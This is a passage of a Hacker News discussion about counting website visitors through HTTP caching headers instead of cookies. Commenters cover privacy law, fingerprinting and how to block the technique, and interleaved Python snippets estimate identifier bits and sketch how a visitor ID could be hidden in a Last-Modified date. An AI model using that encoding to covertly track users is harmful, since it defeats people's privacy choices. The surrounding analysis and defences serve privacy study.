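        tally.bounces -= 1  # the visitor came back, so not a bounce after all
        return 2
    return 2  # saturate: hit 3 and hit 300 look identical
```

Since the state never goes past 2, the heaviest visitor of the day is indistinguishable from anyone else who has loaded the page twice.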
        
       | josephscott wrote:
       | This reminded me of something I haven't thought about in a while:
       | evercookie - https://github.com/samyk/evercookie
        
       | [deleted]
        
       | tobr wrote:
       | That's pretty clever. I think if you really want to keep it
       | privacy respecting, you should stop counting at 1 - so you can
       | distinguish the first vs subsequent visits, but you can't tell if
       | someone has visited 2 or 200 times.
        
         | AkshatJ27 wrote:
         | what is the problem with letting a website know how many times
         | I have visited the page? How is it better for a website to only
         | know if I have visited earlier or not?
        
           | xyproto wrote:
           | Many clients may have visited only one time, but when you
           | reach higher numbers they may be used together with other
           | data to help identify users.
           | 
           | Maybe only one user will have over 100 visits, and then you
           | can uniquely identify them.
        
             | barefeg wrote:
             | Makes sense. I'm not very experienced in privacy but could
             | you explain why uniquely identifying the user is a problem?
             | As in you can tell that there's one user who visited 100
             | times but how can you use that information to correlate
             | with an identity?
        
               | _justinfunk wrote:
               | This is also my question that all the people wearing
               | their smart lawyer hats seem to be claiming but not
               | explaining.
        
         | WirelessGigabit wrote:
         | Every subsequent visit they bump up the number.
        
         | cortesoft wrote:
         | I am having trouble understanding how knowing someone has
         | visited three times is more privacy invasive than knowing they
         | visited twice. What is so magical about 3?
        
           | tobr wrote:
           | Consider that there's some long tail of visitors who visit
           | many times in one day. Someone is going to be visiting more
           | times than anyone else, whether that's 10 or 100 or 1000 page
           | views. That person is now uniquely trackable. To avoid that
           | situation you need to stop counting somewhere, and you're not
           | really getting any new info after 1 (well, 2 I suppose, if
           | you want to track bounces), so you might as well stop there.
        
             | dahfizz wrote:
             | I don't agree that the existence of this header makes a
             | user more trackable. You can already uniquely identify
             | visitors with their IP & source port, which is included in
             | every single packet and is way more specific than some
             | timestamp.
             | 
             | Your argument seems to be that this timestamp in the header
             | could possibly be used as a lookup key in a database of
             | visitors. I think that's a stretch, but in any case that
             | database would be the privacy violating thing. This header
             | is completely anonymous.
        
               | tobr wrote:
               | You're probably right! But since they aren't getting any
               | more info by continuing to count after 2, it's just a
               | liability to do it. After all, the whole point of the
               | setup seems to be to minimize the amount of unique
               | information the system has to process.
        
           | o_m wrote:
           | Counting to two is needed to handle the bounce rate.
        
           | kube-system wrote:
           | 3 is magical in that it comes after 2.
           | 
           | If 100 people visited once, and one person visited twice...
           | then a new request with visitCount=3 is that second person.
        
       | Jabdoa2 wrote:
       | I guess according to GDPR this counts as tracking nonetheless.
       | GDPR does not specifically mention cookies or anything technical.
       | An identifier is enough (does not have to be a uuid). IP,
       | location, browser etc already counts. This probably would count
       | as storing something like a cookie on the client.
        
       | WirelessGigabit wrote:
       | I wonder how this works with systems like Akamai which by default
       | mess with those headers.
        
       | DueDilligence wrote:
       | .. and we're fast on-track of a webkit extension to block this
       | BS.
        
         | cactacea wrote:
         | Why block it entirely when you can just feed them garbage data?
        
           | cpeterso wrote:
           | Sending a garbage Last-Modified time might confuse the server
           | and cause unpredictable problems for the user. Blocking it is
           | safe because the server will just assume this is the first
           | time the user has visited the website.
        
           | enkrs wrote:
           | What's the motivation to block/misinform?
           | 
           | This allows site owners get statistics on page
           | views/uniques/bounces without unique identifier cookies or
           | javascript injections.
           | 
           | I'm all for blocking any abusive tracking methods, but this
           | looks to me like creative website statistics that works for
           | single domain. What's the harm by measuring that?
        
             | michaelt wrote:
             | While this _particular_ implementation doesn't track
             | individuals, couldn't you trivially start tracking
             | individuals by sending them unique random times like _last-
             | modified: 12 Mar 1978 12:34:56 GMT_ thereby giving them a
             | ~30 bit unique identifier for as long as the file is
             | cached?
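
A quick Python check of the "~30 bit" estimate above, assuming the server picks any whole second between the Unix epoch and the date of this thread (the date range is an assumption; HTTP dates could in principle go earlier).

```python
import math
from datetime import datetime, timezone

epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
thread_date = datetime(2022, 11, 30, tzinfo=timezone.utc)

# Number of distinct one-second timestamps available in that range.
distinct_seconds = int((thread_date - epoch).total_seconds())

# Bits of identifier a single Last-Modified value could carry.
identifier_bits = math.log2(distinct_seconds)
print(distinct_seconds, round(identifier_bits, 2))
```

That comes to a little over 30 bits, or roughly 1.67 billion distinct values per cached file.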
        
               | pwdisswordfish0 wrote:
               | Only if you disregard the amount of latitude that the
               | semantics of these headers give to UAs that would
               | effectively thwart this method of tracking.
               | 
               | If I fetch your /foo.html today in November 2022, and you
               | send me a last-modified from 1978, that gives me and my
               | UA a huge range from which to select a different datetime
               | (anywhere between the 1978 value and now-ish) on my next
               | request. How are you going to correlate my original and
               | subsequent requests if in the latter I ask if you've got
               | a copy that's been modified since 1999?
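
A hedged Python sketch of the idea in the comment above: the client replaces the stored Last-Modified with a random instant before echoing it back. The function name `fuzzed_if_modified_since` is hypothetical, and the upper bound here is the time the cached copy was fetched rather than "now-ish", a deliberate narrowing so that a genuine change made after the fetch is never masked by a 304.

```python
import random
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime


def fuzzed_if_modified_since(
    last_modified: str, fetched_at: datetime, rng: random.Random
) -> str:
    """Pick a random whole second between Last-Modified and the fetch time."""
    start = parsedate_to_datetime(last_modified)
    if start.tzinfo is None:
        start = start.replace(tzinfo=timezone.utc)  # assume UTC if no zone
    start = start.astimezone(timezone.utc)
    end = fetched_at.astimezone(timezone.utc).replace(microsecond=0)
    span = int((end - start).total_seconds())
    if span <= 0:
        # Nothing to randomize over; fall back to the server's own value.
        return format_datetime(start, usegmt=True)
    chosen = start + timedelta(seconds=rng.randint(0, span))
    return format_datetime(chosen, usegmt=True)
```

A server that compares dates by exact match rather than by ordering may answer such a request with a full 200, so this costs some caching in exchange for breaking the correlation.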
        
               | marshray wrote:
               | Sure, a UA _could_ do a whole lot of things to resist
               | fingerprinting.
               | 
               | But users go to the web with the browser they've been
               | given.
               | 
               | Apple, famously, forbids its users to speak HTTP with
               | anything else on iOS.
        
             | nkrisc wrote:
             | > Whats the motivation to block/misinform?
             | 
             | What's the motivation to submit to it?
        
               | yojo wrote:
               | Allowing websites to get a somewhat accurate count of
               | visitors plus bounce rate helps them to tell how they're
               | doing. Hopefully, they use that to guide developing a
               | better product/service.
               | 
               | If you can allow them to do that without getting tracked,
               | it's win-win. You get a better experience when they build
               | a better service.
        
         | yojo wrote:
         | To be clear, they're not generating _unique_ headers. They're
         | setting them to the day start, so they can tell if the
         | requester has already been to the site today or not. It
         | actually seems pretty reasonable.
        
           | pavon wrote:
           | The way they are using it is providing less information than
           | a UID cookie would, but the same amount of information as a
           | boolean "previously visited" cookie. However, now that the
           | technique is known there is nothing stopping people from
           | using the same method to store a UID date, and privacy
           | protecting clients will have difficulty differentiating
           | between the two, so best to eliminate this as a
           | fingerprinting method altogether.
        
             | not2b wrote:
             | People keep saying in this thread "there is nothing
             | stopping people from using the same method" to do something
             | else! I think that this is an irrelevant criticism. This is
             | a valid attempt to minimize the amount of information
             | collected on visitors and still providing a unique visitors
             | per day count, and the fact that someone could build a
             | similar but different system that looks like a cookie isn't
             | relevant.
        
               | pavon wrote:
               | They demonstrated a PoC that uses an HTTP feature in a
               | way it wasn't intended to add entropy to fingerprinting
               | techniques. Discussing how this same exploit could be
               | used maliciously by others and how to prevent that isn't
               | criticism of the PoC, it is standard security practice.
        
             | chipsa wrote:
             | But you can't have as many bits in a UID date as for a
             | generic cookie, and a privacy protecting client could just
             | ignore the ones that don't make sense. Does a 1978 date
             | make sense? Probably not. You could scale this up to the
             | millions, probably, but it won't scale infinitely.
        
               | genewitch wrote:
               | roblox has ~50mm daily users (DAU), and if my math is
               | correct (it probably isn't) you could have hour
               | granularity (only 0-23) timestamps on 6 files, each day,
               | and track 191mm unique users. I used roblox because i
               | knew their DAU off-the-cuff - because roblox requires a
               | login, they know who you are anyhow.
               | 
               | But if you do 1 second granularity a mere 2 cache
               | timestamps are enough to fingerprint everyone on the
               | planet, each day.
               | 
               | is my math wrong, here?
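
The arithmetic in the comment above can be checked directly. This Python snippet assumes each cached file independently carries one timestamp per day, and uses 8 billion as a round world-population figure (an assumption, not a number from the thread).

```python
import math

# Six files, each with an hour-granularity timestamp (24 choices per file).
hourly_six_files = 24 ** 6

# Two files, each with a second-granularity timestamp (86,400 choices per file).
secondly_two_files = 86_400 ** 2

world_population = 8_000_000_000  # assumed round figure

print(hourly_six_files)                       # distinct IDs from six hourly stamps
print(secondly_two_files)                     # distinct IDs from two per-second stamps
print(secondly_two_files >= world_population)
print(round(math.log2(secondly_two_files), 1))  # bits of identifier
```

So the 191 million figure holds. Two per-second timestamps give about 7.46 billion combinations, slightly short of 8 billion under that assumption; a third file would put it far beyond.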
        
         | rnhmjoj wrote:
         | There probably is one already: this method is so old that the
         | documentation of privoxy shows[1] how to defeat it. I can
         | confirm it works: their example[2] website says I've visited
         | 61996 times.
         | 
         | [1]: https://www.privoxy.org/user-manual/actions-
         | file.html#OVERWR...
         | 
         | [2]: https://lastmodified.normally.com/
        
       | jesprenj wrote:
       | What's the reason for not storing a cookie? It's not like
       | browsers that don't support cookies are targeted, right? Cookies
       | can also be "great for privacy", if their power is not abused
       | server-side ...
        
       | jefftk wrote:
       | I think this is probably illegal in EU countries. The ePrivacy
       | Directive requires consent before storing data on a user's
       | machine that isn't strictly necessary for providing the service
       | the user requested. Analytics isn't "strictly necessary", and
       | ePrivacy doesn't care whether you use the Cookie header or some
       | other method of storage.
       | 
       | I do think this is better for privacy than standard id-based
       | approaches, but the law is very strict. More:
       | https://www.jefftk.com/p/why-so-many-cookie-banners
       | 
       | (Not a lawyer)
        
         | yellow_lead wrote:
         | Assuming you're correct, can anyone think of a way to count
         | unique visitors without storing data on a users machine _or_
         | using identifiable user information? Identifiable user
         | information should include hashes that can be re-computed given
         | the original information.
         | 
         | This isn't a criticism of the law, I'm just curious what
         | options there could be, because I can't think of any.
        
           | genewitch wrote:
           | Hi there, Marketing Company Intern!
           | 
           | Tell them you'd rather make the coffee ;-)
        
             | 411111111111111 wrote:
             | Ha, that would explain that question. My first reaction was
             | mostly confusion as there is so much prior art at this
             | point, i.e. fingerprinting through installed add-ons,
             | resolution/window size/system language, browser language,
             | IP locality etc. There are even demo pages around which
             | show you just how unique your configuration is even
             | without anything else.
             | 
             | https://amiunique.org/fp
        
             | yellow_lead wrote:
             | Lol, I knew it would sound that way, but I don't work in
             | this domain - just interested in privacy and this problem.
        
               | genewitch wrote:
               | the only reason we could think of for wanting unique
               | visitors was for the marketing people or
               | investors/stakeholders/shareholders. Parsing the request
               | logs should be sufficient for every other metric.
               | 
               | We had a bunch of meetings about this at what essentially
               | amounted to a giant information superhighway billboard
               | company. IIRC someone brought up using cache headers even
               | back then, because it didn't require cookies or
               | javascript, which we couldn't guarantee would be "up to
               | date"; this was back in the "target IE6, still" days.
               | 
               | As one of my networking friends said, advertisers usually
               | know everything about your metrics, even if you don't.
               | You can't really fudge the numbers in your favor, so raw
               | requests or QPS or whatever ancillary metric would be
               | enough.
               | 
               | The method in the article is defeated by clearing your
               | session when you're done browsing, or by using an
               | incognito/private browsing tab, as that should mark all
               | "cached" items for deletion.
        
           | [deleted]
        
         | Quarrelsome wrote:
         | I thought GDPR cared mostly about uniquely identifying visitors
         | which this does not do. You still need a cookie banner to state
         | that you will put some data on their machine but you always
         | need one of those.
        
           | jefftk wrote:
           | _> you always need one of those_
           | 
           | The withcabin.com landing page claims you don't need consent
           | banners to use it.
        
             | t0mas88 wrote:
             | That claim is false in Europe. You need to ask permission
             | for this approach, because you're storing something on the
             | user's device (the generated date in the cache) that isn't
             | strictly necessary. The ePrivacy directive says you need
             | permission for that. Nowhere does the law specify "cookies";
             | it's about any kind of data stored on the user's device.
        
               | jefftk wrote:
               | Uh, yes? That's exactly what I've been saying upthread.
        
               | mgrund wrote:
               | True, it does not matter if it's a cookie or whatever.
               | You need to look to the ePrivacy directive article 5.3
               | for which exemption case applies. In the case of
               | timestamps, it would be case A:
               | 
               | > when the cookie is used "for the sole purpose of
               | carrying out the transmission of a communication over an
               | electronic communications network" ("Exemption A")
               | 
               | Since the timestamp is no longer used solely for this
               | purpose, you need consent.
        
       | bvinc wrote:
       | What's to stop someone from sending unique last-modified dates to
       | uniquely fingerprint browsers?
        
         | nightpool wrote:
         | Because the cache key for the site is partitioned by top-level
         | origin in modern browsers, they wouldn't get any additional
         | information this way that they couldn't get with existing
         | first-party storage techniques, such as service worker caches,
         | session cookies, IndexedDB, etc. See, for example,
         | https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P...
         | Opening a new incognito window would trivially
         | defeat this method of "tracking". This is basically just a very
         | small first-party-only cookie.
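To make the question above concrete: a minimal Python sketch of how a server could, in principle, hide an ID in a Last-Modified date and read it back from the If-Modified-Since header the browser echoes on its next request. The names `BASE`, `id_to_last_modified` and `last_modified_to_id` are hypothetical, and this is not presented as what the article's service does. As the reply notes, with a partitioned cache such an ID would only be visible within one top-level site.

```python
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

# Hypothetical fixed reference instant; IDs are stored as seconds past it.
BASE = datetime(2000, 1, 1, tzinfo=timezone.utc)


def id_to_last_modified(visitor_id: int) -> str:
    """Encode an integer ID as an HTTP-date for a Last-Modified header."""
    return format_datetime(BASE + timedelta(seconds=visitor_id), usegmt=True)


def last_modified_to_id(if_modified_since: str) -> int:
    """Recover the ID from the If-Modified-Since value the browser echoes."""
    echoed = parsedate_to_datetime(if_modified_since)
    if echoed.tzinfo is None:  # treat a zone-less date as UTC
        echoed = echoed.replace(tzinfo=timezone.utc)
    return int((echoed - BASE).total_seconds())
```

For example, `id_to_last_modified(42)` returns `"Sat, 01 Jan 2000 00:00:42 GMT"`, and passing that string to `last_modified_to_id` gives back `42`. Clearing the cache or opening a private window discards the stored date, and the ID with it.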
        
           | SahAssar wrote:
           | Then why not use a cookie? The laws regarding tracking are
           | not actually about cookies, but about all cookie-like
           | tracking. What does this method gain?
        
             | nightpool wrote:
             | The ability to put "no cookies :)" in your marketing
             | materials
        
             | [deleted]
        
       | 1vuio0pswjnm7 wrote:
       | What happens if the user disables Javascript?
       | 
       | The page lastmodified.normally.com claims "Works in any browser
       | or any server". What if the browser has no Javascript engine?
       | 
       | In this case I tried the demo with a browser that has a JS
       | engine, with JS enabled, and the demo still did not work. That is
       | because "ping.withcabin.com" was not disclosed to the user. The
       | OP suggests that users access "lastmodified.normally.com". It
       | says nothing about accessing "ping.withcabin.com". As such, the
       | proxy does not contain any address info for that domain. The user
       | (me) never typed it.
       | 
       | Instead of a browser, I use a localhost-bound forward proxy to
       | control requests and responses, including HTTP headers. The proxy
       | contains all of the domain-to-IP address mappings I need in
       | memory. Why should I add an IP address for "ping.withcabin.com"?
       | The request returns no content.
       | 
       | 1. For example, something like
       | 
       |     acl cabin hdr(host) -m str ping.withcabin.com
       |     http-request del-header If-Modified-Since if cabin
       |     http-response del-header Cache-Control if cabin
       |     http-response del-header Last-Modified if cabin
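The same filtering idea, as a rough Python sketch for readers who do not use a proxy with this rule syntax: drop If-Modified-Since from requests to the tracking host, and drop Cache-Control and Last-Modified from its responses. The function names and the plain-dict representation of headers are assumptions made for illustration only; the commenter's actual setup is the proxy configuration above.

```python
# Host taken from the comment above; everything else here is illustrative.
TRACKED_HOST = "ping.withcabin.com"


def _drop(headers: dict, names: list) -> dict:
    """Return a copy of headers without the named fields (case-insensitive)."""
    lowered = {name.lower() for name in names}
    return {k: v for k, v in headers.items() if k.lower() not in lowered}


def filter_request(host: str, headers: dict) -> dict:
    """Strip the conditional-request header sent to the tracking host."""
    if host.lower() != TRACKED_HOST:
        return dict(headers)
    return _drop(headers, ["If-Modified-Since"])


def filter_response(host: str, headers: dict) -> dict:
    """Strip the caching headers returned by the tracking host."""
    if host.lower() != TRACKED_HOST:
        return dict(headers)
    return _drop(headers, ["Cache-Control", "Last-Modified"])
```

With both filters in place the browser never stores a date for that host and never echoes one back, so every request looks like a first visit.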
        
       | bennyp101 wrote:
       | Seems a fairly benign way of counting how many people are
       | visiting your site.
       | 
       | Not like it's tracking you across domains and services, more a
       | counter for how many people have visited, and either stayed and
       | looked around, or left.
        
         | meowface wrote:
         | >Not like it's tracking you across domains and services
         | 
         | The same can be said of first-party cookies.
        
       ___________________________________________________________________
       (page generated 2022-11-30 23:00 UTC)